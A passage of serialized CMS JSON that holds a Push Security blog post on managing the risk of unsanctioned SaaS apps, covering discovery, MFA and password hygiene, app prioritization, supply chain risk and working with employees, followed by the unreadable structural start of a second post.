off. These kinds of actions widen the divide between security and the rest of the company, which is never a good thing. ",[],{},{"nodeType":178,"data":296826,"content":296827},{},[296828],{"nodeType":173,"value":296829,"marks":296830,"data":296831},"Stay cool, stay calm, we’ve got this. To manage SaaS, you need some sense of control over what employees are using and how they’re using it, right? By working with employees and doing the legwork to understand their needs, you can start to repair relationships there, which makes your job much easier in the long run.",[],{},{"nodeType":178,"data":296833,"content":296834},{},[296835],{"nodeType":173,"value":296836,"marks":296837,"data":296838},"However, before we go down the path of understanding how employees are using SaaS, you first need to know which apps they’re using.",[],{},{"nodeType":169,"data":296840,"content":296841},{},[296842],{"nodeType":173,"value":296843,"marks":296844,"data":296845},"How do I find the SaaS apps employees are actually using?",[],{},{"nodeType":178,"data":296847,"content":296848},{},[296849,296853,296858,296862,296870],{"nodeType":173,"value":296850,"marks":296851,"data":296852},"You can discover the apps employees are using in a couple ways: 1) manually, using the data you already have access to or, 2) using a pre-existing tool (oh hey, we have one you can ",[],{},{"nodeType":173,"value":296854,"marks":296855,"data":296857},"use for free",[296856],{"type":194},{},{"nodeType":173,"value":296859,"marks":296860,"data":296861},"). We wrote a ",[],{},{"nodeType":186,"data":296863,"content":296865},{"uri":296864},"https://pushsecurity.com/blog/rolling-your-own-saas-discovery/",[296866],{"nodeType":173,"value":5387,"marks":296867,"data":296869},[296868],{"type":194},{},{"nodeType":173,"value":296871,"marks":296872,"data":296873}," about how you might do the manual approach for SaaS discovery, though fair warning… this manual effort isn’t for the faint of heart.",[],{},{"nodeType":178,"data":296875,"content":296876},{},[296877],{"nodeType":173,"value":296878,"marks":296879,"data":296880},"For the purposes of this guide, we’re going to assume you’ve taken care of the SaaS discovery process already and you’re now facing a list of SaaS - potentially a very large one - you didn’t know employees were using. ",[],{},{"nodeType":178,"data":296882,"content":296883},{},[296884,296888,296896],{"nodeType":173,"value":296885,"marks":296886,"data":296887},"If you haven’t discovered the unknown SaaS in your organization, we suggest you ",[],{},{"nodeType":186,"data":296889,"content":296891},{"uri":296890},"https://login.pushsecurity.com/u/signup",[296892],{"nodeType":173,"value":296893,"marks":296894,"data":296895},"sign up",[],{},{"nodeType":173,"value":296897,"marks":296898,"data":296899},", let us do the heavy lifting for you to discover SaaS, then use that list as a starting point for this next phase of the process…",[],{},{"nodeType":169,"data":296901,"content":296902},{},[296903],{"nodeType":173,"value":296904,"marks":296905,"data":296906},"I’ve found some SaaS apps I didn’t know about. Now what?",[],{},{"nodeType":178,"data":296908,"content":296909},{},[296910,296914,296922],{"nodeType":173,"value":296911,"marks":296912,"data":296913},"You’ve found the apps (hooray!), so now you’re on the hook to figure out what risks those apps might pose to the company (wasn’t ignorance bliss?). Does it help to know that most organizations find a large list of unknown apps so you’re not alone? A ",[],{},{"nodeType":186,"data":296915,"content":296917},{"uri":296916},"https://track.g2.com/resources/shadow-it-statistics",[296918],{"nodeType":173,"value":24477,"marks":296919,"data":296921},[296920],{"type":194},{},{"nodeType":173,"value":296923,"marks":296924,"data":296925}," from G2 Crowd stated that the average company has 975 unknown cloud services and that 67% of teams have introduced their own collaboration tools into an organization.",[],{},{"nodeType":178,"data":296927,"content":296928},{},[296929],{"nodeType":173,"value":296930,"marks":296931,"data":296932},"Even though you’re not alone, you still need to protect employee and company data from unnecessary third-party risk. Here’s a quick rundown of what you need to do next to get a handle on SaaS without restricting its use.",[],{},{"nodeType":312,"data":296934,"content":296938},{"target":296935},{"sys":296936},{"id":296937,"type":317,"linkType":318},"TgFACpcpdooMuPLPXvlk4",[],{"nodeType":246189,"data":296940,"content":296941},{},[296942,297000,297015,297030,297045],{"nodeType":254,"data":296943,"content":296944},{},[296945,296957],{"nodeType":178,"data":296946,"content":296947},{},[296948,296953],{"nodeType":173,"value":296949,"marks":296950,"data":296952},"Ensure basic account security controls are in place across all SaaS. ",[296951],{"type":370},{},{"nodeType":173,"value":296954,"marks":296955,"data":296956},"To get at this information, you’ll need either a tool (we got you!) or you’ll need to go directly to employees to get necessary information about how they’re accessing and using SaaS. You’ll need to know:",[],{},{"nodeType":246189,"data":296958,"content":296959},{},[296960,296970,296980,296990],{"nodeType":254,"data":296961,"content":296962},{},[296963],{"nodeType":178,"data":296964,"content":296965},{},[296966],{"nodeType":173,"value":296967,"marks":296968,"data":296969},"Are employees using multi-factor authentication (MFA) or two-factor authentication (2FA) where available? ",[],{},{"nodeType":254,"data":296971,"content":296972},{},[296973],{"nodeType":178,"data":296974,"content":296975},{},[296976],{"nodeType":173,"value":296977,"marks":296978,"data":296979},"What about strong passwords and password policies? ",[],{},{"nodeType":254,"data":296981,"content":296982},{},[296983],{"nodeType":178,"data":296984,"content":296985},{},[296986],{"nodeType":173,"value":296987,"marks":296988,"data":296989},"Are they sharing passwords across multiple apps? ",[],{},{"nodeType":254,"data":296991,"content":296992},{},[296993],{"nodeType":178,"data":296994,"content":296995},{},[296996],{"nodeType":173,"value":296997,"marks":296998,"data":296999},"Are they sharing login credentials as a team - some teams will do this to stay on a free or trial tier by only having a “single” user. ",[],{},{"nodeType":254,"data":297001,"content":297002},{},[297003],{"nodeType":178,"data":297004,"content":297005},{},[297006,297011],{"nodeType":173,"value":297007,"marks":297008,"data":297010},"Try to identify SaaS that is no longer needed/used and remove it. ",[297009],{"type":370},{},{"nodeType":173,"value":297012,"marks":297013,"data":297014},"You won't believe how quickly you build up SaaS baggage as users move to the newest hottest thing.",[],{},{"nodeType":254,"data":297016,"content":297017},{},[297018],{"nodeType":178,"data":297019,"content":297020},{},[297021,297026],{"nodeType":173,"value":297022,"marks":297023,"data":297025},"Identify apps that are used to create and store data you care about. ",[297024],{"type":370},{},{"nodeType":173,"value":297027,"marks":297028,"data":297029},"Then prioritize them for some additional scrutiny.",[],{},{"nodeType":254,"data":297031,"content":297032},{},[297033],{"nodeType":178,"data":297034,"content":297035},{},[297036,297041],{"nodeType":173,"value":297037,"marks":297038,"data":297040},"Identify apps that integrate with those core apps. ",[297039],{"type":370},{},{"nodeType":173,"value":297042,"marks":297043,"data":297044},"They’re also processing that same data you care about. These are usually called OAuth applications or third-party integrations like apps and bots that add functionality and features to the core app.",[],{},{"nodeType":254,"data":297046,"content":297047},{},[297048,297064],{"nodeType":178,"data":297049,"content":297050},{},[297051,297055,297060],{"nodeType":173,"value":297052,"marks":297053,"data":297054},"Where your additional scrutiny identifies risks you can't live with, ",[],{},{"nodeType":173,"value":297056,"marks":297057,"data":297059},"stop new users adopting those apps (by giving them a better alternative)",[297058],{"type":370},{},{"nodeType":173,"value":297061,"marks":297062,"data":297063}," and migrate existing users over to that alternative, approved app. ",[],{},{"nodeType":246189,"data":297065,"content":297066},{},[297067],{"nodeType":254,"data":297068,"content":297069},{},[297070],{"nodeType":178,"data":297071,"content":297072},{},[297073],{"nodeType":173,"value":297074,"marks":297075,"data":297076},"To do this, you’ll need to look for secure alternatives to the SaaS employees are using that you have deemed too risky. This is important, albeit time-consuming. Offering an alternative sweetens the process for using more secure platforms before you outright block the bad ones. It also lets your colleagues know you’re considering their needs and not just restricting their work.",[],{},{"nodeType":178,"data":297078,"content":297079},{},[297080],{"nodeType":173,"value":297081,"marks":297082,"data":297083},"Beyond just the security of the technology itself, you need to ensure employees are doing their part in using the app securely. ",[],{},{"nodeType":169,"data":297085,"content":297086},{},[297087],{"nodeType":173,"value":297088,"marks":297089,"data":297090},"How to prioritize which apps require additional scrutiny",[],{},{"nodeType":178,"data":297092,"content":297093},{},[297094],{"nodeType":173,"value":297095,"marks":297096,"data":297097},"There’s no right or wrong approach for how to prioritize the apps you find during the discovery process, but we’ve found that most our customers prioritize apps based on if the app is:",[],{},{"nodeType":250,"data":297099,"content":297100},{},[297101,297111,297121,297140],{"nodeType":254,"data":297102,"content":297103},{},[297104],{"nodeType":178,"data":297105,"content":297106},{},[297107],{"nodeType":173,"value":297108,"marks":297109,"data":297110},"used by many people in the company, and",[],{},{"nodeType":254,"data":297112,"content":297113},{},[297114],{"nodeType":178,"data":297115,"content":297116},{},[297117],{"nodeType":173,"value":297118,"marks":297119,"data":297120},"requesting access to highly sensitive data to work or integrating with SaaS that have data you don’t want exposed. This might be a cloud drive containing all sorts of documents, a CRM that uses customer data inputs, a billing platform, an app that’s used for signing legal documents, an HR platform, etc.",[],{},{"nodeType":254,"data":297122,"content":297123},{},[297124],{"nodeType":178,"data":297125,"content":297126},{},[297127,297131,297136],{"nodeType":173,"value":297128,"marks":297129,"data":297130},"one you’ve never heard of before. Larger SaaS apps built for businesses (Salesforce, Microsoft, Google, etc.) are ",[],{},{"nodeType":173,"value":297132,"marks":297133,"data":297135},"more likely",[297134],{"type":1646},{},{"nodeType":173,"value":297137,"marks":297138,"data":297139}," to be secure than some of the smaller, newer SaaS apps who haven’t gone through the same levels of security reviews before going to market. ",[],{},{"nodeType":254,"data":297141,"content":297142},{},[297143],{"nodeType":178,"data":297144,"content":297145},{},[297146],{"nodeType":173,"value":297147,"marks":297148,"data":297149},"used by high profile employees or employees with access to very sensitive corporate information (C-level executives, finance, legal, HR, etc.). ",[],{},{"nodeType":178,"data":297151,"content":297152},{},[297153],{"nodeType":173,"value":297154,"marks":297155,"data":297156},"For example, if you have a whole team using a single app that you’ve never heard of, add that app to the top of your priorities list for investigation. It’s likely business critical and serving a need for that team, so taking it away won’t be a good idea if you’re trying to build bridges between security and employees. Plus, more users probably means more data is stored within the app. Those users might also have integrated a lot of third-party apps or bots (OAuth) to that core application. ",[],{},{"nodeType":178,"data":297158,"content":297159},{},[297160,297164,297172],{"nodeType":173,"value":297161,"marks":297162,"data":297163},"Once you’ve determined which apps need investigation and prioritized them, head over to the National Cyber Security Centre’s ",[],{},{"nodeType":186,"data":297165,"content":297167},{"uri":297166},"https://www.ncsc.gov.uk/collection/cloud/the-cloud-security-principles/lightweight-approach-to-cloud-security",[297168],{"nodeType":173,"value":297169,"marks":297170,"data":297171},"lightweight approach to cloud security",[],{},{"nodeType":173,"value":297173,"marks":297174,"data":297175}," article. They offer some great guidance for how to reasonably access the risk of a SaaS app with limited time and resources. ",[],{},{"nodeType":178,"data":297177,"content":297178},{},[297179],{"nodeType":173,"value":297180,"marks":297181,"data":297182},"A big missing piece most companies have in their SaaS security strategy, though, is that they’re not working with employees to understand how they’re using SaaS. Before you roll your eyes, hear us out…",[],{},{"nodeType":169,"data":297184,"content":297185},{},[297186],{"nodeType":173,"value":297187,"marks":297188,"data":297189},"Secure SaaS by working with employees",[],{},{"nodeType":178,"data":297191,"content":297192},{},[297193],{"nodeType":173,"value":297194,"marks":297195,"data":297196},"Remember, employees are the owners of SaaS in your company - they’ve adopted and used SaaS tools in your environment, so they know better than anyone else how they’re using it, if they’re still using it, what the additional integrations in the app offer, and what it does for them. You, as their security lead, know how to determine if they’re logging in securely, if the data the app is requesting access to is an acceptable risk, if they’ve enabled built-in common sense security features like 2FA/MFA, and if the third-party integrations they’ve added are too high risk or requesting excessive permissions.",[],{},{"nodeType":178,"data":297198,"content":297199},{},[297200],{"nodeType":173,"value":297201,"marks":297202,"data":297203},"By working with employees, you can get the full picture of SaaS use within the company and understand what your colleagues need and coach them to improve the security of how they’re accessing and using the tools they prefer. The problem is that it’s really difficult to do manually in a real world environment because it’s just so time-consuming to reach out to each employee and ask a series of questions to get the context you need. ",[],{},{"nodeType":178,"data":297205,"content":297206},{},[297207],{"nodeType":173,"value":297208,"marks":297209,"data":297210},"If an entire team is using an app you weren’t aware of, you can talk to the technical owner or administrator of the app to understand how they’re using it. What doesn’t work at scale with manual outreach, however, is understanding how securely employees are logging in and accessing SaaS. ",[],{},{"nodeType":178,"data":297212,"content":297213},{},[297214],{"nodeType":173,"value":297215,"marks":297216,"data":297217},"You can automate this process with the right tool, using things like ChatOps and browser notifications, and just sit back and watch as employees improve their own security over time. This is particularly useful when it comes to some of the security hygiene basics, like using strong passwords and enabling MFA, which make a significant impact on overall security posture for very little effort.",[],{},{"nodeType":169,"data":297219,"content":297220},{},[297221],{"nodeType":173,"value":297222,"marks":297223,"data":297224},"What will I gain from working with employees?",[],{},{"nodeType":178,"data":297226,"content":297227},{},[297228],{"nodeType":173,"value":297229,"marks":297230,"data":297231},"Now that you know that working directly with employees to secure SaaS isn’t a pipe dream, nor does it have to be a manual effort or a one-off security campaign, what impact should you expect from these efforts? And how do you measure that impact?",[],{},{"nodeType":178,"data":297233,"content":297234},{},[297235],{"nodeType":173,"value":297236,"marks":297237,"data":297238},"Here are some of the most obvious wins…",[],{},{"nodeType":235,"data":297240,"content":297241},{},[297242],{"nodeType":173,"value":297243,"marks":297244,"data":297245},"Reduce your attack surface",[],{},{"nodeType":178,"data":297247,"content":297248},{},[297249],{"nodeType":173,"value":297250,"marks":297251,"data":297252},"Say you discover your marketing team is using Trello to manage projects, while the sales team is using Asana. Once you have this information, you can talk to the heads of each department to see if they’ll agree on a single solution. ",[],{},{"nodeType":178,"data":297254,"content":297255},{},[297256],{"nodeType":173,"value":297257,"marks":297258,"data":297259},"Without management, you’re likely to wind up using multiple (often dozens) of chat, project management, calendar-sharing apps and so on within your company. The issue with this is that it opens you up to unnecessary risk, with your data being held on the systems of hundreds of third parties outside of your traditional perimeter. By connecting users to each other and consolidating the SaaS apps in your company, you can dramatically reduce your attack surface. ",[],{},{"nodeType":178,"data":297261,"content":297262},{},[297263,297267,297276,297280],{"nodeType":173,"value":297264,"marks":297265,"data":297266},"Similarly, removing dormant apps and accounts can have a huge impact. In a ",[],{},{"nodeType":186,"data":297268,"content":297270},{"uri":297269},"https://productiv.com/blog/less-than-half-of-company-saas-applications-are-regularly-used-by-employees/",[297271],{"nodeType":173,"value":297272,"marks":297273,"data":297275},"recent report",[297274],{"type":194},{},{"nodeType":173,"value":3107,"marks":297277,"data":297279},[297278],{"type":194},{},{"nodeType":173,"value":297281,"marks":297282,"data":297283},"by Productiv, they found that on average only 45% of the apps an organization or its employees have an account with are regularly engaged with. That means that potentially half of your SaaS attack surface is totally unnecessary.",[],{},{"nodeType":178,"data":297285,"content":297286},{},[297287],{"nodeType":173,"value":297288,"marks":297289,"data":297290},"Working with employees to find out what apps they are using (and which they are no longer) will allow you to eliminate attacker opportunities to access your data or steal employee account credentials.  ",[],{},{"nodeType":235,"data":297292,"content":297293},{},[297294],{"nodeType":173,"value":297295,"marks":297296,"data":297297},"Reduce supply chain risk",[],{},{"nodeType":178,"data":297299,"content":297300},{},[297301],{"nodeType":173,"value":297302,"marks":297303,"data":297304},"Every third-party SaaS app that your employees use is a supplier and therefore contributes to your overall supply chain risk exposure. Traditionally all technology and software providers will have been reviewed by security teams to ensure that they do not present excessive risk to your organization. However, the explosion in SaaS use has made this more challenging; 1) Most organizations have a large number of SaaS suppliers and its growing, 2) SaaS suppliers are now responsible for more aspects of security than on-prem software suppliers ever were (such as infrastructure security) so there is more to review and assure. ",[],{},{"nodeType":178,"data":297306,"content":297307},{},[297308],{"nodeType":173,"value":297309,"marks":297310,"data":297311},"Every time a duplicate or dormant SaaS app is removed, you’re removing a supplier whose security practices and posture need assuring. This saves your security team bags of time and reduces your overall cyber risk exposure. ",[],{},{"nodeType":178,"data":297313,"content":297314},{},[297315],{"nodeType":173,"value":297316,"marks":297317,"data":297318},"However, for the third-parties you need to continue to work with, you’ll want to perform due diligence to make sure you aren’t exposing yourself to the risk of a supply chain attack. ",[],{},{"nodeType":178,"data":297320,"content":297321},{},[297322],{"nodeType":173,"value":297323,"marks":297324,"data":297325},"Before you can trust a SaaS vendor with your data, you have to be assured the vendor is committed to maintaining an appropriate security standard and has the resources and capabilities to deliver against it. And you need to know how the vendor will secure your data when it is in transit, use and at rest. Understand how the vendor secures their network, monitors for malicious activity, what they’ll do in the event of an incident, and whether they have an adequate business continuity and disaster recovery plan. ",[],{},{"nodeType":178,"data":297327,"content":297328},{},[297329],{"nodeType":173,"value":297330,"marks":297331,"data":297332},"To speed up the due diligence process, you might rely on the vendor providing certification of a recognized standard, such as ISO27001, which demonstrates a solid security baseline.",[],{},{"nodeType":235,"data":297334,"content":297335},{},[297336],{"nodeType":173,"value":297337,"marks":297338,"data":297339},"Establish security as a business enabler",[],{},{"nodeType":178,"data":297341,"content":297342},{},[297343],{"nodeType":173,"value":297344,"marks":297345,"data":297346},"One thing to note, if you’re removing an app, it’s always a good idea to notify the employee(s) using it and suggest secure alternatives. Security teams are often seen as a blocker to be avoided and worked around. During that conversation, you can ask them what they were using the app for and then do some research to offer an alternative option that isn’t as risky to the company. ",[],{},{"nodeType":178,"data":297348,"content":297349},{},[297350],{"nodeType":173,"value":297351,"marks":297352,"data":297353},"Being able to recommend useful tools that can help your colleagues with their jobs (as opposed to just saying no or blocking unsanctioned apps) is  the difference between being seen as a business enabler rather than a business blocker. Once your security team is known for promoting innovative new technology as well as managing risk, employee engagement will increase. ",[],{},{"nodeType":235,"data":297355,"content":297356},{},[297357],{"nodeType":173,"value":297358,"marks":297359,"data":297360},"Greater productivity and competitiveness",[],{},{"nodeType":178,"data":297362,"content":297363},{},[297364],{"nodeType":173,"value":297365,"marks":297366,"data":297367},"SaaS has empowered employees to self-adopt the tools that will help them do their jobs better. This is something that should be harnessed, not resisted. A more productive workforce creates a more competitive company. Security’s job is to manage the risks it introduces to a level that the business can accept, not to eliminate those risks altogether. ",[],{},{"nodeType":178,"data":297369,"content":297370},{},[297371],{"nodeType":173,"value":297372,"marks":297373,"data":297374},"Balancing productivity returns with cyber risk requires employees and security to work together to understand the trade-off and make the best decision for the whole organization. If you can facilitate this collaboration to make better decisions, faster as to what technology and tools your organization can safely take advantage of, then your organization will be more competitive and more successful.  ",[],{},{"nodeType":169,"data":297376,"content":297377},{},[297378],{"nodeType":173,"value":297379,"marks":297380,"data":297381},"You can secure SaaS without pissing off employees",[],{},{"nodeType":178,"data":297383,"content":297384},{},[297385],{"nodeType":173,"value":297386,"marks":297387,"data":297388},"We’ll end this blog with a single key takeaway: ",[],{},{"nodeType":231,"data":297390,"content":297391},{},[],{"nodeType":178,"data":297393,"content":297394},{},[297395],{"nodeType":173,"value":297396,"marks":297397,"data":297398},"To keep employees happy and productive while still securing corporate data, you need to work with them to understand what they need and point them at the most secure SaaS alternative. ",[],{},{"nodeType":231,"data":297400,"content":297401},{},[],{"nodeType":178,"data":297403,"content":297404},{},[297405],{"nodeType":173,"value":297406,"marks":297407,"data":297408},"One of the big wins that’s really hard to measure or quantify is that by working with employees, you position yourself as a business enabler. The more you know about the tools employees are choosing to use, the more you understand their needs and desires so that you can find a balanced solution.",[],{},{"nodeType":178,"data":297410,"content":297411},{},[297412],{"nodeType":173,"value":297413,"marks":297414,"data":297415},"We would never recommend that you just open the gates to SaaS and leave employees to sign up with wild abandon, but strictly locking down SaaS clearly doesn’t work. With more SaaS apps coming to market daily, the only approach that can scale and keep up with employees’ needs for productivity and flexibility is one that makes them part of the conversation. You’ve got to work with the SaaS users and empathize with their needs. Only then can you really create a cloud security strategy that’s going to work in the real world. With new tools that can do the heavy lifting for you, a user-powered approach finally makes sense. You got this.",[],{},"5 steps to manage the risk of unsanctioned SaaS ","Learn some lightweight ways to manage the risks SaaS introduces without relying on restrictive policies that block employees from using their preferred tools.","2022-08-11T00:00:00.000Z","manage-saas-risks-without-hindering-employees",{"items":297421},[297422,297424],{"sys":297423,"name":274157},{"id":274156},{"sys":297425,"name":26133},{"id":26132},{"items":297427},[297428],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":297429},{"url":13981},{"__typename":1528,"sys":297431,"content":297432,"title":282544,"synopsis":282545,"hashTags":118,"publishedDate":282546,"slug":282547,"tagsCollection":298091,"authorsCollection":298097},{"id":281802},{"json":297433},{"nodeType":165,"data":297434,"content":297435},{},[297436,297442,297448,297454,297462,297468,297473,297479,297484,297490,297496,297502,297508,297514,297520,297526,297532,297538,297551,297557,297563,297568,297574,297580,297593,297610,297616,297622,297628,297634,297640,297646,297664,297670,297676,297682,297688,297694,297700,297706,297712,297725,297755,297763,297769,297775,297781,297787,297808,297814,297820,297826,297832,297838,297844,297850,297856,297861,297867,297873,297879,297889,297895,297901,297907,297912,297918,297924,297930,297951,297957,297963,297969,297982,297988,297994,298000,298057,298062,298068,298074,298080,298085],{"nodeType":178,"data":297437,"content":297438},{},[297439],{"nodeType":173,"value":281811,"marks":297440,"data":297441},[],{},{"nodeType":178,"data":297443,"content":297444},{},[297445],{"nodeType":173,"value":280354,"marks":297446,"data":297447},[],{},{"nodeType":178,"data":297449,"content":297450},{},[297451],{"nodeType":173,"value":281824,"marks":297452,"data":297453},[],{},{"nodeType":178,"data":297455,"content":297456},{},[297457],{"nodeType":173,"value":281831,"marks":297458,"data":297461},[297459,297460],{"type":370},{"type":1646},{},{"nodeType":178,"data":297463,"content":297464},{},[297465],{"nodeType":173,"value":281840,"marks":297466,"data":297467},[],{},{"nodeType":312,"data":297469,"content":297472},{"target":297470},{"sys":297471},{"id":280474,"type":317,"linkType":318},[],{"nodeType":178,"data":297474,"content":297475},{},[297476],{"nodeType":173,"value":281852,"marks":297477,"data":297478},[],{},{"nodeType":312,"data":297480,"content":297483},{"target":297481},{"sys":297482},{"id":280624,"type":317,"linkType":318},[],{"nodeType":178,"data":297485,"content":297486},{},[297487],{"nodeType":173,"value":281864,"marks":297488,"data":297489},[],{},{"nodeType":169,"data":297491,"content":297492},{},[297493],{"nodeType":173,"value":281871,"marks":297494,"data":297495},[],{},{"nodeType":178,"data":297497,"content":297498},{},[297499],{"nodeType":173,"value":281878,"marks":297500,"data":297501},[],{},{"nodeType":178,"data":297503,"content":297504},{},[297505],{"nodeType":173,"value":281885,"marks":297506,"data":297507},[],{},{"nodeType":169,"data":297509,"content":297510},{},[297511],{"nodeType":173,"value":281892,"marks":297512,"data":297513},[],{},{"nodeType":235,"data":297515,"content":297516},{},[297517],{"nodeType":173,"value":280712,"marks":297518,"data":297519},[],{},{"nodeType":178,"data":297521,"content":297522},{},[297523],{"nodeType":173,"value":281905,"marks":297524,"data":297525},[],{},{"nodeType":235,"data":297527,"content":297528},{},[297529],{"nodeType":173,"value":281912,"marks":297530,"data":297531},[],{},{"nodeType":178,"data":297533,"content":297534},{},[297535],{"nodeType":173,"value":281919,"marks":297536,"data":297537},[],{},{"nodeType":178,"data":297539,"content":297540},{},[297541,297544,297548],{"nodeType":173,"value":281926,"marks":297542,"data":297543},[],{},{"nodeType":173,"value":281930,"marks":297545,"data":297547},[297546],{"type":1646},{},{"nodeType":173,"value":10557,"marks":297549,"data":297550},[],{},{"nodeType":235,"data":297552,"content":297553},{},[297554],{"nodeType":173,"value":281941,"marks":297555,"data":297556},[],{},{"nodeType":178,"data":297558,"content":297559},{},[297560],{"nodeType":173,"value":281948,"marks":297561,"data":297562},[],{},{"nodeType":312,"data":297564,"content":297567},{"target":297565},{"sys":297566},{"id":280733,"type":317,"linkType":318},[],{"nodeType":235,"data":297569,"content":297570},{},[297571],{"nodeType":173,"value":280739,"marks":297572,"data":297573},[],{},{"nodeType":178,"data":297575,"content":297576},{},[297577],{"nodeType":173,"value":280746,"marks":297578,"data":297579},[],{},{"nodeType":178,"data":297581,"content":297582},{},[297583,297586,297590],{"nodeType":173,"value":281972,"marks":297584,"data":297585},[],{},{"nodeType":173,"value":281976,"marks":297587,"data":297589},[297588],{"type":1646},{},{"nodeType":173,"value":281981,"marks":297591,"data":297592},[],{},{"nodeType":178,"data":297594,"content":297595},{},[297596,297601,297605],{"nodeType":173,"value":281988,"marks":297597,"data":297600},[297598,297599],{"type":370},{"type":1646},{},{"nodeType":173,"value":281994,"marks":297602,"data":297604},[297603],{"type":1646},{},{"nodeType":173,"value":10557,"marks":297606,"data":297609},[297607,297608],{"type":370},{"type":1646},{},{"nodeType":178,"data":297611,"content":297612},{},[297613],{"nodeType":173,"value":282007,"marks":297614,"data":297615},[],{},{"nodeType":235,"data":297617,"content":297618},{},[297619],{"nodeType":173,"value":282014,"marks":297620,"data":297621},[],{},{"nodeType":178,"data":297623,"content":297624},{},[297625],{"nodeType":173,"value":282021,"marks":297626,"data":297627},[],{},{"nodeType":235,"data":297629,"content":297630},{},[297631],{"nodeType":173,"value":282028,"marks":297632,"data":297633},[],{},{"nodeType":178,"data":297635,"content":297636},{},[297637],{"nodeType":173,"value":282035,"marks":297638,"data":297639},[],{},{"nodeType":178,"data":297641,"content":297642},{},[297643],{"nodeType":173,"value":282042,"marks":297644,"data":297645},[],{},{"nodeType":178,"data":297647,"content":297648},{},[297649,297652,297661],{"nodeType":173,"value":282049,"marks":297650,"data":297651},[],{},{"nodeType":1698,"data":297653,"content":297656},{"target":297654},{"sys":297655},{"id":282056,"type":317,"linkType":318},[297657],{"nodeType":173,"value":28052,"marks":297658,"data":297660},[297659],{"type":194},{},{"nodeType":173,"value":197,"marks":297662,"data":297663},[],{},{"nodeType":178,"data":297665,"content":297666},{},[297667],{"nodeType":173,"value":282069,"marks":297668,"data":297669},[],{},{"nodeType":178,"data":297671,"content":297672},{},[297673],{"nodeType":173,"value":282076,"marks":297674,"data":297675},[],{},{"nodeType":169,"data":297677,"content":297678},{},[297679],{"nodeType":173,"value":282083,"marks":297680,"data":297681},[],{},{"nodeType":235,"data":297683,"content":297684},{},[297685],{"nodeType":173,"value":282090,"marks":297686,"data":297687},[],{},{"nodeType":178,"data":297689,"content":297690},{},[297691],{"nodeType":173,"value":282097,"marks":297692,"data":297693},[],{},{"nodeType":178,"data":297695,"content":297696},{},[297697],{"nodeType":173,"value":282104,"marks":297698,"data":297699},[],{},{"nodeType":235,"data":297701,"content":297702},{},[297703],{"nodeType":173,"value":282111,"marks":297704,"data":297705},[],{},{"nodeType":178,"data":297707,"content":297708},{},[297709],{"nodeType":173,"value":282118,"marks":297710,"data":297711},[],{},{"nodeType":178,"data":297713,"content":297714},{},[297715,297718,297722],{"nodeType":173,"value":282125,"marks":297716,"data":297717},[],{},{"nodeType":173,"value":280833,"marks":297719,"data":297721},[297720],{"type":1646},{},{"nodeType":173,"value":280838,"marks":297723,"data":297724},[],{},{"nodeType":250,"data":297726,"content":297727},{},[297728,297737,297746],{"nodeType":254,"data":297729,"content":297730},{},[297731],{"nodeType":178,"data":297732,"content":297733},{},[297734],{"nodeType":173,"value":280851,"marks":297735,"data":297736},[],{},{"nodeType":254,"data":297738,"content":297739},{},[297740],{"nodeType":178,"data":297741,"content":297742},{},[297743],{"nodeType":173,"value":280861,"marks":297744,"data":297745},[],{},{"nodeType":254,"data":297747,"content":297748},{},[297749],{"nodeType":178,"data":297750,"content":297751},{},[297752],{"nodeType":173,"value":280871,"marks":297753,"data":297754},[],{},{"nodeType":178,"data":297756,"content":297757},{},[297758],{"nodeType":173,"value":282169,"marks":297759,"data":297762},[297760,297761],{"type":370},{"type":1646},{},{"nodeType":178,"data":297764,"content":297765},{},[297766],{"nodeType":173,"value":280887,"marks":297767,"data":297768},[],{},{"nodeType":235,"data":297770,"content":297771},{},[297772],{"nodeType":173,"value":282184,"marks":297773,"data":297774},[],{},{"nodeType":178,"data":297776,"content":297777},{},[297778],{"nodeType":173,"value":282191,"marks":297779,"data":297780},[],{},{"nodeType":178,"data":297782,"content":297783},{},[297784],{"nodeType":173,"value":282198,"marks":297785,"data":297786},[],{},{"nodeType":250,"data":297788,"content":297789},{},[297790,297799],{"nodeType":254,"data":297791,"content":297792},{},[297793],{"nodeType":178,"data":297794,"content":297795},{},[297796],{"nodeType":173,"value":282211,"marks":297797,"data":297798},[],{},{"nodeType":254,"data":297800,"content":297801},{},[297802],{"nodeType":178,"data":297803,"content":297804},{},[297805],{"nodeType":173,"value":282221,"marks":297806,"data":297807},[],{},{"nodeType":178,"data":297809,"content":297810},{},[297811],{"nodeType":173,"value":282228,"marks":297812,"data":297813},[],{},{"nodeType":235,"data":297815,"content":297816},{},[297817],{"nodeType":173,"value":282235,"marks":297818,"data":297819},[],{},{"nodeType":178,"data":297821,"content":297822},{},[297823],{"nodeType":173,"value":282242,"marks":297824,"data":297825},[],{},{"nodeType":178,"data":297827,"content":297828},{},[297829],{"nodeType":173,"value":282249,"marks":297830,"data":297831},[],{},{"nodeType":169,"data":297833,"content":297834},{},[297835],{"nodeType":173,"value":282256,"marks":297836,"data":297837},[],{},{"nodeType":235,"data":297839,"content":297840},{},[297841],{"nodeType":173,"value":282263,"marks":297842,"data":297843},[],{},{"nodeType":178,"data":297845,"content":297846},{},[297847],{"nodeType":173,"value":282270,"marks":297848,"data":297849},[],{},{"nodeType":178,"data":297851,"content":297852},{},[297853],{"nodeType":173,"value":282277,"marks":297854,"data":297855},[],{},{"nodeType":312,"data":297857,"content":297860},{"target":297858},{"sys":297859},{"id":280936,"type":317,"linkType":318},[],{"nodeType":235,"data":297862,"content":297863},{},[297864],{"nodeType":173,"value":282289,"marks":297865,"data":297866},[],{},{"nodeType":178,"data":297868,"content":297869},{},[297870],{"nodeType":173,"value":282296,"marks":297871,"data":297872},[],{},{"nodeType":178,"data":297874,"content":297875},{},[297876],{"nodeType":173,"value":282303,"marks":297877,"data":297878},[],{},{"nodeType":178,"data":297880,"content":297881},{},[297882,297885],{"nodeType":173,"value":282310,"marks":297883,"data":297884},[],{},{"nodeType":173,"value":282314,"marks":297886,"data":297888},[297887],{"type":1646},{},{"nodeType":235,"data":297890,"content":297891},{},[297892],{"nodeType":173,"value":282322,"marks":297893,"data":297894},[],{},{"nodeType":178,"data":297896,"content":297897},{},[297898],{"nodeType":173,"value":282329,"marks":297899,"data":297900},[],{},{"nodeType":178,"data":297902,"content":297903},{},[297904],{"nodeType":173,"value":282336,"marks":297905,"data":297906},[],{},{"nodeType":312,"data":297908,"content":297911},{"target":297909},{"sys":297910},{"id":274541,"type":317,"linkType":318},[],{"nodeType":235,"data":297913,"content":297914},{},[297915],{"nodeType":173,"value":282348,"marks":297916,"data":297917},[],{},{"nodeType":178,"data":297919,"content":297920},{},[297921],{"nodeType":173,"value":282355,